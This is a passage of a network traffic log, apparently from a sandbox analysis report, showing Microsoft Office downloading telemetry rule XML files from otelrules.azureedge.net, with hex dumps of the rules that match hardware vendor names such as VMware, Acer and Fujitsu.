2024-11-22 19:36:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:04 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 9bcae678-901e-007b-2946-3cac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193604Z-178bfbc474b9fdhphC1NYCac0n00000003a000000000ftnb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:04 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49776	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:03 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:04 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: aff2abcc-f01e-0003-4547-3c4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193604Z-178bfbc474b7cbwqhC1NYC8z4n000000037000000000sa5h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:04 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49775	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:03 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:04 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: f440515e-401e-0029-2e38-3c9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193604Z-178bfbc474bpnd5vhC1NYC4vr400000003f00000000062tr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:04 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	49777	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:04 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:04 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: a69f297f-901e-002a-244c-3c7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193604Z-15b8b599d88tmlzshC1TEB4xpn00000001r000000000h8xm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:04 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49778	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:06 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:06 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:06 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193606Z-178bfbc474b7cbwqhC1NYC8z4n00000003ag00000000cruv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:06 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49779	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:06 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:06 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:06 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 7fd471a5-f01e-00aa-27bf-3b8521000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193606Z-15b8b599d8885prmhC1TEBsnkw0000000210000000008brm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:06 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49780	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:06 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:06 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:06 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: caffefd3-a01e-003d-6e3c-3c98d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193606Z-178bfbc474bh5zbqhC1NYCkdug000000038g00000000s3a8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:06 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49781	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:06 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:06 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:06 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 8189730a-201e-0003-216a-3bf85a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193606Z-178bfbc474bw8bwphC1NYC38b4000000037g00000000e9ss x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:06 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49783	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:06 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:06 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:06 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: df770720-601e-0002-4a47-3ca786000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193606Z-178bfbc474bv587zhC1NYCny5w000000035000000000whv2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:06 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49784	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:08 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:08 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:08 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 367ebca4-601e-0070-6762-3ba0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193608Z-178bfbc474bq2pr7hC1NYCkfgg00000003g000000000k327 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:08 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49785	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:08 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:08 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:08 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 7a05741d-701e-0021-0754-3c3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193608Z-15b8b599d88qw29phC1TEB5zag00000001rg00000000shvr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:08 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49786	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:08 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:08 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:08 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: f19b5380-801e-0015-2749-3cf97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193608Z-15b8b599d88hd9g7hC1TEBp75c00000001tg00000000fz08 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:08 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49787	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
